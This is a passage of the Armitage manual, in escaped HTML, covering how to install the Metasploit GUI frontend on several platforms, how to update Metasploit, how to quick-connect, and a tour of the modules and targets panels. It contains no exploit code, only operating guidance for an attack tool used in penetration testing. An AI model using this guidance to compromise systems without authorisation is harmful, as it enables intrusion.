&lt;div style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 16px; line-height: 20px; margin-left: auto; margin-right: auto; padding-bottom: 15px; padding-top: 5px;&quot;&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;To quickly install all of the dependencies, you have a few options:&lt;/span&gt;&lt;/div&gt;
&lt;ul style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 16px; line-height: 20px; margin-top: 0px; padding-top: 0px;&quot;&gt;
&lt;li&gt;&lt;span style=&quot;background-color: white;&quot;&gt;Use a Linux distribution for penetration testing such as&amp;nbsp;&lt;a href=&quot;http://www.kali.org/&quot;&gt;Kali Linux&lt;/a&gt;&amp;nbsp;or&amp;nbsp;&lt;a href=&quot;http://www.pentoo.ch/&quot;&gt;Pentoo Linux&lt;/a&gt;.&lt;br /&gt;These distributions ship with Metasploit and its dependencies installed for you.&lt;/span&gt;&lt;/li&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;li&gt;&lt;span style=&quot;background-color: white;&quot;&gt;Use the&amp;nbsp;&lt;a href=&quot;https://github.com/darkoperator/MSF-Installer&quot;&gt;MSF Installer Script&lt;/a&gt;&amp;nbsp;created by DarkOperator.&lt;br /&gt;This option will setup an environment that uses Git for updates.&lt;/span&gt;&lt;/li&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;li&gt;&lt;span style=&quot;background-color: white;&quot;&gt;Use the&amp;nbsp;&lt;a href=&quot;http://www.rapid7.com/products/metasploit/download.jsp&quot;&gt;official installer&lt;/a&gt;&amp;nbsp;provided by Rapid7.&lt;br /&gt;This option will require you to register with Rapid7 to get updates.&lt;/span&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 19px; line-height: 20px; margin: 0px auto; padding-bottom: 12px; text-shadow: rgb(51, 51, 51) 2px 2px 4px;&quot;&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;2.2 Kali Linux&lt;/span&gt;&lt;/h2&gt;
&lt;div style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 16px; line-height: 20px; margin-left: auto; margin-right: auto; padding-bottom: 15px; padding-top: 5px;&quot;&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;&lt;a href=&quot;http://www.kali.org/&quot;&gt;Kali Linux&lt;/a&gt;&amp;nbsp;comes with the Metasploit Framework installed. This is a good option if you want to get up and running with Armitage quickly.&lt;/span&gt;&lt;/div&gt;
&lt;h3 style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 16px; line-height: 20px; margin: 0px auto; padding-bottom: 12px;&quot;&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;Setup Instructions (do these once!)&lt;/span&gt;&lt;/h3&gt;
&lt;ol style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 16px; line-height: 20px;&quot;&gt;
&lt;li&gt;&lt;span style=&quot;background-color: white;&quot;&gt;Open a terminal&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style=&quot;background-color: white;&quot;&gt;Initialize the database:&amp;nbsp;&lt;code&gt;service metasploit start&lt;/code&gt;&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style=&quot;background-color: white;&quot;&gt;Stop the metasploit service:&amp;nbsp;&lt;code&gt;service metasploit stop&lt;/code&gt;&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style=&quot;background-color: white;&quot;&gt;Extract armitage:&amp;nbsp;&lt;code&gt;tar zxvf armitage&lt;em&gt;DDMMYY&lt;/em&gt;.tgz&lt;/code&gt;&lt;/span&gt;&lt;/li&gt;
&lt;/ol&gt;
&lt;h3 style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 16px; line-height: 20px; margin: 0px auto; padding-bottom: 12px;&quot;&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;How to Start Armitage&lt;/span&gt;&lt;/h3&gt;
&lt;ol style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 16px; line-height: 20px;&quot;&gt;
&lt;li&gt;&lt;span style=&quot;background-color: white;&quot;&gt;Open a terminal&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style=&quot;background-color: white;&quot;&gt;Start the PostgreSQL database:&amp;nbsp;&lt;code&gt;service postgres start&lt;/code&gt;&lt;br /&gt;(this does not happen automatically in Kali Linux)&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;code style=&quot;background-color: white;&quot;&gt;cd /path/to/armitage&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code style=&quot;background-color: white;&quot;&gt;./armitage&lt;/code&gt;&lt;/li&gt;
&lt;/ol&gt;
&lt;h2 style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 19px; line-height: 20px; margin: 0px auto; padding-bottom: 12px; text-shadow: rgb(51, 51, 51) 2px 2px 4px;&quot;&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;2.3 BackTrack Linux&lt;/span&gt;&lt;/h2&gt;
&lt;div style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 16px; line-height: 20px; margin-left: auto; margin-right: auto; padding-bottom: 15px; padding-top: 5px;&quot;&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;BackTrack Linux is no longer a supported environment for Armitage. Please move over to&amp;nbsp;&lt;a href=&quot;http://www.fastandeasyhacking.com/manual#kali&quot;&gt;Kali Linux&lt;/a&gt;.&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 16px; line-height: 20px; margin-left: auto; margin-right: auto; padding-bottom: 15px; padding-top: 5px;&quot;&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;If you want to continue to use BackTrack Linux, you must uninstall the Metasploit Framework and install the latest dependencies. Due to dependency changes (far outside of my control) in the framework, your BackTrack Linux environment will not work if you update Metasploit.&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 16px; line-height: 20px; margin-left: auto; margin-right: auto; padding-bottom: 15px; padding-top: 5px;&quot;&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;To uninstall the Metasploit Framework:&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 16px; line-height: 20px; margin-left: auto; margin-right: auto; padding-bottom: 15px; padding-top: 5px;&quot;&gt;
&lt;code style=&quot;background-color: white;&quot;&gt;cd /opt/metasploit&lt;br /&gt;./uninstall&lt;/code&gt;&lt;/div&gt;
&lt;h2 style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 19px; line-height: 20px; margin: 0px auto; padding-bottom: 12px; text-shadow: rgb(51, 51, 51) 2px 2px 4px;&quot;&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;2.4 Linux&lt;/span&gt;&lt;/h2&gt;
&lt;ol style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 16px; line-height: 20px;&quot;&gt;
&lt;li&gt;&lt;span style=&quot;background-color: white;&quot;&gt;Install the Metasploit Framework and its dependencies&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style=&quot;background-color: white;&quot;&gt;Extract armitage&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style=&quot;background-color: white;&quot;&gt;Change to the folder you installed armitage into&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style=&quot;background-color: white;&quot;&gt;Use ./armitage to start Armitage&lt;/span&gt;&lt;/li&gt;
&lt;/ol&gt;
&lt;h2 style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 19px; line-height: 20px; margin: 0px auto; padding-bottom: 12px; text-shadow: rgb(51, 51, 51) 2px 2px 4px;&quot;&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;2.5 Windows&lt;/span&gt;&lt;/h2&gt;
&lt;ol style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 16px; line-height: 20px;&quot;&gt;
&lt;li&gt;&lt;span style=&quot;background-color: white;&quot;&gt;Install Rapid7&#39;s Metasploit Community Edition Installer&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style=&quot;background-color: white;&quot;&gt;Extract armitage&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style=&quot;background-color: white;&quot;&gt;Double-click the armitage.exe file to start Armitage (note: this .exe will fail with a 64-bit Java Runtime environment. Use java -jar armitage.jar in this case.)&lt;/span&gt;&lt;/li&gt;
&lt;/ol&gt;
&lt;h2 style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 19px; line-height: 20px; margin: 0px auto; padding-bottom: 12px; text-shadow: rgb(51, 51, 51) 2px 2px 4px;&quot;&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;2.6 Manual Setup&lt;/span&gt;&lt;/h2&gt;
&lt;div style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 16px; line-height: 20px; margin-left: auto; margin-right: auto; padding-bottom: 15px; padding-top: 5px;&quot;&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;If you choose to setup the Metasploit Framework and its dependencies by hand, here are a few hard and fast requirements to help you:&lt;/span&gt;&lt;/div&gt;
&lt;ul style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 16px; line-height: 20px; margin-top: 0px; padding-top: 0px;&quot;&gt;
&lt;li&gt;&lt;span style=&quot;background-color: white;&quot;&gt;You need a PostgreSQL database. No other database is supported.&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style=&quot;background-color: white;&quot;&gt;msfrpcd must be in $PATH&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style=&quot;background-color: white;&quot;&gt;$MSF_DATABASE_CONFIG must point to a&amp;nbsp;&lt;a href=&quot;http://www.fastandeasyhacking.com/download/sample.yml&quot;&gt;YAML file&lt;/a&gt;&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style=&quot;background-color: white;&quot;&gt;$MSF_DATABASE_CONFIG must be available to msfrpcd and armitage&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style=&quot;background-color: white;&quot;&gt;the msgpack ruby gem is required&lt;/span&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;div style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 16px; line-height: 20px; margin-left: auto; margin-right: auto; padding-bottom: 15px; padding-top: 5px;&quot;&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;Take a look at the following resources for help in this area:&lt;/span&gt;&lt;/div&gt;
&lt;ul style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 16px; line-height: 20px; margin-top: 0px; padding-top: 0px;&quot;&gt;
&lt;li&gt;&lt;span style=&quot;background-color: white;&quot;&gt;&lt;a href=&quot;https://github.com/darkoperator/MSF-Installer&quot;&gt;Darkoperator&#39;s MSF Installer Script&lt;/a&gt;&amp;nbsp;(MacOS X, Ubuntu, and Debian)&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style=&quot;background-color: white;&quot;&gt;&lt;a href=&quot;https://github.com/rapid7/metasploit-framework/wiki/Setting-Up-a-Metasploit-Development-Environment&quot;&gt;Setting Up a Metasploit Development Environment&lt;/a&gt;&lt;br /&gt;^-- these instructions point you to another set of instructions to setup the database. They&#39;re probably fine, but don&#39;t use the supplied YAML file. It uses a lot of YAML features that Armitage can&#39;t parse or understand. Use the&lt;a href=&quot;http://www.fastandeasyhacking.com/download/sample.yml&quot;&gt;sample I provide&lt;/a&gt;&amp;nbsp;instead.&lt;/span&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 19px; line-height: 20px; margin: 0px auto; padding-bottom: 12px; text-shadow: rgb(51, 51, 51) 2px 2px 4px;&quot;&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;2.7 Updating Metasploit&lt;/span&gt;&lt;/h2&gt;
&lt;div style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 16px; line-height: 20px; margin-left: auto; margin-right: auto; padding-bottom: 15px; padding-top: 5px;&quot;&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;When you run&amp;nbsp;&lt;code&gt;msfupdate&lt;/code&gt;, it&#39;s possible that you may break Armitage by doing this. The Metasploit team is cautious about what they commit to the primary git repository and they&#39;re extremely responsive to bug reports. That said, things still break from time to time. Sometimes the framework changes in a way that&#39;s not compatible until I update Armitage.&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 16px; line-height: 20px; margin-left: auto; margin-right: auto; padding-bottom: 15px; padding-top: 5px;&quot;&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;If you run&amp;nbsp;&lt;code&gt;msfupdate&lt;/code&gt;&amp;nbsp;and Armitage stops working, you have a few options.&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 16px; line-height: 20px; margin-left: auto; margin-right: auto; padding-bottom: 15px; padding-top: 5px;&quot;&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;1) You can run&amp;nbsp;&lt;code&gt;msfupdate&lt;/code&gt;&amp;nbsp;later and hope the issue gets fixed. Many times this is a valid strategy.&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 16px; line-height: 20px; margin-left: auto; margin-right: auto; padding-bottom: 15px; padding-top: 5px;&quot;&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;2) You can downgrade Metasploit to the last revision I tested it against. Take a look at the&amp;nbsp;&lt;a href=&quot;http://www.fastandeasyhacking.com/changelog&quot;&gt;change log&lt;/a&gt;&amp;nbsp;file for the latest development release tested against Armitage. The revision number is located next to the release date. To downgrade Metasploit:&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 16px; line-height: 20px; margin-left: auto; margin-right: auto; padding-bottom: 15px; padding-top: 5px;&quot;&gt;
&lt;code style=&quot;background-color: white;&quot;&gt;cd /path/to/metasploit/msf3&lt;br /&gt;source ../scripts/setenv.sh&lt;br /&gt;git pull&lt;br /&gt;git checkout&amp;nbsp;&lt;em&gt;[commit id]&lt;/em&gt;&lt;br /&gt;bundle install&lt;/code&gt;&lt;/div&gt;
&lt;div style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 16px; line-height: 20px; margin-left: auto; margin-right: auto; padding-bottom: 15px; padding-top: 5px;&quot;&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;3) Reinstall Metasploit using the installer provided by Rapid7. The Metasploit installer includes the latest stable version of Metasploit. Usually, this release is very stable.&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 16px; line-height: 20px; margin-left: auto; margin-right: auto; padding-bottom: 15px; padding-top: 5px;&quot;&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;If you&#39;re preparing to use Armitage and Metasploit somewhere important--do not run&amp;nbsp;&lt;code&gt;msfupdate&lt;/code&gt;&amp;nbsp;and assume it will work. It&#39;s very important to stick with what you know works or test the functionality you need to make sure it works. When in doubt, go with option (2) or (3).&lt;/span&gt;&lt;/div&gt;
&lt;h2 style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 19px; line-height: 20px; margin: 0px auto; padding-bottom: 12px; text-shadow: rgb(51, 51, 51) 2px 2px 4px;&quot;&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;2.8 Troubleshooting Help&lt;/span&gt;&lt;/h2&gt;
&lt;div style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 16px; line-height: 20px; margin-left: auto; margin-right: auto; padding-bottom: 15px; padding-top: 5px;&quot;&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;If you&#39;re having trouble connecting Armitage to Metasploit, click the&amp;nbsp;Help&amp;nbsp;button to get troubleshooting advice. This button will take you to the&amp;nbsp;&lt;a href=&quot;http://www.fastandeasyhacking.com/start&quot;&gt;Armitage Startup Troubleshooting Guide&lt;/a&gt;.&lt;/span&gt;&lt;/div&gt;
&lt;h2 style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 19px; line-height: 20px; margin: 0px auto; padding-bottom: 12px; text-shadow: rgb(51, 51, 51) 2px 2px 4px;&quot;&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;2.9 Quick Connect&lt;/span&gt;&lt;/h2&gt;
&lt;div style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 16px; line-height: 20px; margin-left: auto; margin-right: auto; padding-bottom: 15px; padding-top: 5px;&quot;&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;If you&#39;d like to quickly connect Armitage to a Metasploit server without filling in the setup dialog, use the&amp;nbsp;&lt;code&gt;--client&lt;/code&gt;option to specify a file with the connection details.&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 16px; line-height: 20px; margin-left: auto; margin-right: auto; padding-bottom: 15px; padding-top: 5px;&quot;&gt;
&lt;code style=&quot;background-color: white;&quot;&gt;java -jar armitage.jar --client connect.prop&lt;/code&gt;&lt;/div&gt;
&lt;div style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 16px; line-height: 20px; margin-left: auto; margin-right: auto; padding-bottom: 15px; padding-top: 5px;&quot;&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;Here&#39;s an example connect.prop file:&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 16px; line-height: 20px; margin-left: auto; margin-right: auto; padding-bottom: 15px; padding-top: 5px;&quot;&gt;
&lt;code style=&quot;background-color: white;&quot;&gt;host=192.168.95.241&lt;br /&gt;port=55553&lt;br /&gt;user=mister&lt;br /&gt;pass=bojangles&lt;/code&gt;&lt;/div&gt;
&lt;div style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 16px; line-height: 20px; margin-left: auto; margin-right: auto; padding-bottom: 15px; padding-top: 5px;&quot;&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;If you have to manage multiple Armitage/Metasploit servers, consider creating a desktop shortcut that calls this --client option with a different properties file for each server.&lt;/span&gt;&lt;/div&gt;
&lt;h1 style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 24px; line-height: 20px; margin: 0px auto; padding-bottom: 16px; text-shadow: rgb(51, 51, 51) 4px 4px 8px;&quot;&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;3. User Interface Tour&lt;/span&gt;&lt;/h1&gt;
&lt;h2 style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 19px; line-height: 20px; margin: 0px auto; padding-bottom: 12px; text-shadow: rgb(51, 51, 51) 2px 2px 4px;&quot;&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;3.1 Overview&lt;/span&gt;&lt;/h2&gt;
&lt;div style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 16px; line-height: 20px; margin-left: auto; margin-right: auto; padding-bottom: 15px; padding-top: 5px;&quot;&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;The Armitage user interface has three main panels: modules, targets, and tabs. You may click the area between these panels to resize them to your liking.&lt;/span&gt;&lt;/div&gt;
&lt;center style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 16px; line-height: 20px;&quot;&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;&lt;img alt=&quot;Armitage User Interface&quot; src=&quot;http://www.fastandeasyhacking.com/images/uitour.png&quot; /&gt;&lt;/span&gt;&lt;/center&gt;
&lt;h2 style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 19px; line-height: 20px; margin: 0px auto; padding-bottom: 12px; text-shadow: rgb(51, 51, 51) 2px 2px 4px;&quot;&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;3.2 Modules&lt;/span&gt;&lt;/h2&gt;
&lt;div style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 16px; line-height: 20px; margin-left: auto; margin-right: auto; padding-bottom: 15px; padding-top: 5px;&quot;&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;The module browser lets you launch a Metasploit auxiliary module, throw an exploit, generate a payload, and run a post-exploitation module. Click through the tree to find the desired module. Double click the module to open a module launch dialog.&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 16px; line-height: 20px; margin-left: auto; margin-right: auto; padding-bottom: 15px; padding-top: 5px;&quot;&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;Armitage will configure the module to run against the selected hosts. This works for auxiliary modules, exploits, and post modules.&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;tip&quot; style=&quot;border: 1px dashed rgb(136, 136, 136); font-family: Arial, Helvetica, sans-serif; font-size: 16px; line-height: 20px; margin-bottom: 1em; margin-left: 4em; margin-right: 4em; padding: 1em 1em 15px;&quot;&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;Running a module against multiple hosts is one of the big advantages of Armitage. In the Metasploit console, you must configure and launch an exploit and post modules for each host you&#39;re working with.&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 16px; line-height: 20px; margin-left: auto; margin-right: auto; padding-bottom: 15px; padding-top: 5px;&quot;&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;You can search modules too. Click in the search box below the tree, type a wildcard expression (e.g., ssh_*), and press enter. The module tree will show the search results, expanded for quick viewing. Clear the search box and press enter to restore the module browser to its original state.&lt;/span&gt;&lt;/div&gt;
&lt;h2 style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 19px; line-height: 20px; margin: 0px auto; padding-bottom: 12px; text-shadow: rgb(51, 51, 51) 2px 2px 4px;&quot;&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;3.3 Targets - Graph View&lt;/span&gt;&lt;/h2&gt;
&lt;div style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 16px; line-height: 20px; margin-left: auto; margin-right: auto; padding-bottom: 15px; padding-top: 5px;&quot;&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;The targets panel shows your targets to you. Armitage represents each target as a computer with its IP address and other information about it below the computer. The computer screen shows the operating system the computer is running.&lt;/span&gt;&lt;/div&gt;
&lt;center style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 16px; line-height: 20px;&quot;&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;&lt;img alt=&quot;Metasploited Targets&quot; src=&quot;http://www.fastandeasyhacking.com/images/armitage_targets.png&quot; /&gt;&lt;/span&gt;&lt;/center&gt;
&lt;div style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 16px; line-height: 20px; margin-left: auto; margin-right: auto; padding-bottom: 15px; padding-top: 5px;&quot;&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;A red computer with electrical jolts indicates a compromised host.&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 16px; line-height: 20px; margin-left: auto; margin-right: auto; padding-bottom: 15px; padding-top: 5px;&quot;&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;A directional green line indicates a pivot from one host to another. Pivoting allows Metasploit to route attacks and scans through intermediate hosts. A bright green line indicates the pivot communication path is in use.&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 16px; line-height: 20px; margin-left: auto; margin-right: auto; padding-bottom: 15px; padding-top: 5px;&quot;&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;Click a host to select it. You may select multiple hosts by clicking and dragging a box over the desired hosts.&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 16px; line-height: 20px; margin-left: auto; margin-right: auto; padding-bottom: 15px; padding-top: 5px;&quot;&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;Right click a host to bring up a menu with available options. The attached menu will show attack and login options, menus for existing sessions, and options to edit the host information.&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 16px; line-height: 20px; margin-left: auto; margin-right: auto; padding-bottom: 15px; padding-top: 5px;&quot;&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;The&amp;nbsp;login&amp;nbsp;menu is only available after a port scan reveals open ports that Metasploit can use. The&amp;nbsp;Attack&amp;nbsp;menu is only available after finding attacks through the&amp;nbsp;Attacks&amp;nbsp;menu at the top of Armitage.&amp;nbsp;Shell&amp;nbsp;and&amp;nbsp;Meterpreter&amp;nbsp;menus show up when a shell or Meterpreter session exists on the selected host.&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 16px; line-height: 20px; margin-left: auto; margin-right: auto; padding-bottom: 15px; padding-top: 5px;&quot;&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;Several keyboard shortcuts are available in the targets panel. To edit these, go to&amp;nbsp;Armitage&amp;nbsp;-&amp;gt;&amp;nbsp;Preferences.&lt;/span&gt;&lt;/div&gt;
&lt;ul style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 16px; line-height: 20px; margin-top: 0px; padding-top: 0px;&quot;&gt;
&lt;li&gt;&lt;span style=&quot;background-color: white;&quot;&gt;Ctrl Plus&amp;nbsp;- zoom in&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style=&quot;background-color: white;&quot;&gt;Ctrl Minus&amp;nbsp;- zoom out&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style=&quot;background-color: white;&quot;&gt;Ctrl 0&amp;nbsp;- reset the zoom level&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style=&quot;background-color: white;&quot;&gt;Ctrl A&amp;nbsp;- select all hosts&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style=&quot;background-color: white;&quot;&gt;Escape&amp;nbsp;- clear selection&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style=&quot;background-color: white;&quot;&gt;Ctrl C&amp;nbsp;- arrange hosts into a circle&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style=&quot;background-color: white;&quot;&gt;Ctrl S&amp;nbsp;- arrange hosts into a stack&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style=&quot;background-color: white;&quot;&gt;Ctrl H&amp;nbsp;- arrange hosts into a hierarchy. This only works when a pivot is set up.&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style=&quot;background-color: white;&quot;&gt;Ctrl P&amp;nbsp;- export hosts into an image&lt;/span&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;div style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 16px; line-height: 20px; margin-left: auto; margin-right: auto; padding-bottom: 15px; padding-top: 5px;&quot;&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;Right click the targets area with no selected hosts to configure the layout and zoom-level of the targets area.&lt;/span&gt;&lt;/div&gt;
&lt;h2 style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 19px; line-height: 20px; margin: 0px auto; padding-bottom: 12px; text-shadow: rgb(51, 51, 51) 2px 2px 4px;&quot;&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;3.4 Targets - Table View&lt;/span&gt;&lt;/h2&gt;
&lt;div style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 16px; line-height: 20px; margin-left: auto; margin-right: auto; padding-bottom: 15px; padding-top: 5px;&quot;&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;If you have a lot of hosts, the graph view becomes difficult to work with. For this situation Armitage has a table view. Go to&amp;nbsp;Armitage&amp;nbsp;-&amp;gt;&amp;nbsp;Set Target View&amp;nbsp;-&amp;gt;&amp;nbsp;Table View&amp;nbsp;to switch to this mode. Armitage will remember your preference.&lt;/span&gt;&lt;/div&gt;
&lt;center style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 16px; line-height: 20px;&quot;&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;&lt;img alt=&quot;Armitage Targets Table View&quot; src=&quot;http://www.fastandeasyhacking.com/images/armitage_tableview.png&quot; /&gt;&lt;/span&gt;&lt;/center&gt;
&lt;div style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 16px; line-height: 20px; margin-left: auto; margin-right: auto; padding-bottom: 15px; padding-top: 5px;&quot;&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;Click any of the table headers to sort the hosts. Highlight a row and right-click it to bring up a menu with options for that host.&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 16px; line-height: 20px; margin-left: auto; margin-right: auto; padding-bottom: 15px; padding-top: 5px;&quot;&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;Armitage will bold the IP address of any host with sessions. If a pivot is in use, Armitage will make it bold as well.&lt;/span&gt;&lt;/div&gt;
&lt;h2 style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 19px; line-height: 20px; margin: 0px auto; padding-bottom: 12px; text-shadow: rgb(51, 51, 51) 2px 2px 4px;&quot;&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;3.5 Tabs&lt;/span&gt;&lt;/h2&gt;
&lt;div style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 16px; line-height: 20px; margin-left: auto; margin-right: auto; padding-bottom: 15px; padding-top: 5px;&quot;&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;Armitage opens each dialog, console, and table in a tab below the module and target panels. Click the&amp;nbsp;X&amp;nbsp;button to close a tab.&lt;/span&gt;&lt;/div&gt;
